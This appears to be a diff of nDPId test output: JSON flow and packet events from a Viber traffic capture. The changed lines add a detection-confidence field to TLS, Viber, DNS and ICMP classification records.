-01233{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}}
+00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01259{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679410,"flow_last_seen":1527155679410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155679410,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1527155679410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155679410,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8V2ZAAEAGC9HAqAAREskEA4PQAbvgGt8vAAAAAKAC\/\/+jOgAAAgQFtAQCCAoAIYhJAAAAAAEDAwc="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdf+NAAEAR4d\/AqAAREskEA5UuHzEBCY\/LBbgBAAUANRj1GJhk5EcHridUEQCowC6VMgAAAEMBABABAPdbkpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAGwkdkSv31AWZshbdezAt4SmQgEbXQ8gpESKVZEPm+yytcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6SNCb6pEPHTLEjikG3nU2iKPCm3mBiaaSkNyyVaokw3bFWKZLztddqHjISoa\/0AQVn24h8Bz7MKBuS1UkASdYsAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+f+RAAEAR4r3AqAAREskEA5UuHzMAKui4BbgZADUY9RiYZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1527155679413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAuf+VAAEAR4szAqAAREskEA5UuHzEAGscOBbgRAAEAAAAuCDgEAAAHridU"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1527155679413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwf+ZAAEAR4snAqAAREskEA5UuHzEAHM1MBbgJAPtbkpFjAQAANRj1GJhk5Ec="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwpnZAACsR0cESyQQDwKgAER8zlS4AHM86BbgaADUY9RiYZORHMkN8Xi6VAMg="}
@@ -125,42 +125,42 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1527155679444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155679444,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0V2dAAEAGC9jAqAAREskEA4PQAbvgGt8wdKSu+oAQAq1ZEAAAAQEICgAhiFIA5FGt"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1527155685529,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155685529,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8KqJAAEARjp7AqAARwKgAD8OxADUAKKNciEIBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="}
-00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1527155685530,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1527155685530,"pkt":"MAdNo1+nAA6OMNv9CABFAABMZZhAAEARU5jAqAAPwKgAEQA1w7EAOLypiEKBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAABfAATYOs1k"}
-00750{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1527155685530,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.205.100"}}
+00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1527155685530,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.205.100"}}
 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 02395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1527155685757,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1527155685757,"pkt":"AA6OMNv9MAdNo1+nCABFAAXcfu9AAEABNMHAqAARwKgADwgA3UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204}
 02395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1527155685757,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1527155685757,"pkt":"MAdNo1+nAA6OMNv9CABFAAXcOTwAAEABunTAqAAPwKgAEQAA5UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="}
